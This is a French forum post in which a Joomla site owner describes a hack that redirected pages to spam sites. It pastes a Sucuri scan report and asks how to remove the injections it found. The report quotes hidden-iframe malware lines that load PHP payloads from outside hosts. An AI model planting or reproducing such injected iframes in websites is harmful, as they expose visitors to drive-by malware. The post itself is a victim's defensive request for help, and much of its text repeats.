Tweet
Bonjour
Ma config principale :Joomla 2.5.11 - JCE 2.3.2.4 - et multisites JMS2 1.3.11
Depuis quelques temps mes différents sites ont été piratés : pages d'accueil redirigées vers des sites spammmers.
J'ai trouvé des fichiers "htm" à la racine des sites, et mes fichiers "index.php" modifiés
J'ai pu nettoyer et j'ai retrouvé les pages d'accueil.
J'en ai profité pour faire un contrôle avec "sucuri.net" et le résultat a été la découverte de malwares dans les contenus
Par exemple sur un site maitre :
et sur un site esclave :
Je ne trouve pas ces lignes de code dans les contenus (catégories ou articles)
Je ne les vois pas dans la page annoncée en code source (CTRL U)
J'en ai profité pour supprimer l'écriture de code javascrip dans JCE
Comment faire pour les trouver et les enlever ?
Merci d'avance
Ma config principale :Joomla 2.5.11 - JCE 2.3.2.4 - et multisites JMS2 1.3.11
Depuis quelques temps mes différents sites ont été piratés : pages d'accueil redirigées vers des sites spammmers.
J'ai trouvé des fichiers "htm" à la racine des sites, et mes fichiers "index.php" modifiés
J'ai pu nettoyer et j'ai retrouvé les pages d'accueil.
J'en ai profité pour faire un contrôle avec "sucuri.net" et le résultat a été la découverte de malwares dans les contenus
Par exemple sur un site maitre :
Security warning in the URL:
Hidden Iframes.
Details: http://sucuri.net/malware/entry/MW:IFRAME:HD202
<iframe src="http://www.oskzasada.pl/jwjybhj.php" width=1 height=1 style="visibility: hidden">
Security warning in the URL:
http://catechese-par-la-parole.catho...php/fondements
Hidden Iframes.
Details: http://sucuri.net/malware/entry/MW:IFRAME:HD202
<iframe src="http://www.oskzasada.pl/jwjybhj.php" width=1 height=1 style="visibility: hidden">
Security warning in the URL:
http://catechese-par-la-parole.catho...php/fondements
Malware found in the URL:
Hidden Iframes.
Details: http://sucuri.net/malware/entry/MW:IFRAME:HD202
<iframe src="http://www.weisser-hirsch-borgsdorf.de/komgtlo.php" width=1 height=1 style="visibility: hidden">
Known javascript malware.
Details: http://sucuri.net/malware/malware-entry-mwjsanon7
<iframe src="http://www.weisser-hirsch-borgsdorf.de/komgtlo.php" width=1 height=1 style="visibility: hidden"></iframe><!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
Hidden Iframes.
Details: http://sucuri.net/malware/entry/MW:IFRAME:HD202
<iframe src="http://www.weisser-hirsch-borgsdorf.de/komgtlo.php" width=1 height=1 style="visibility: hidden">
Known javascript malware.
Details: http://sucuri.net/malware/malware-entry-mwjsanon7
<iframe src="http://www.weisser-hirsch-borgsdorf.de/komgtlo.php" width=1 height=1 style="visibility: hidden"></iframe><!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
Je ne les vois pas dans la page annoncée en code source (CTRL U)
J'en ai profité pour supprimer l'écriture de code javascrip dans JCE
Comment faire pour les trouver et les enlever ?
Merci d'avance
: 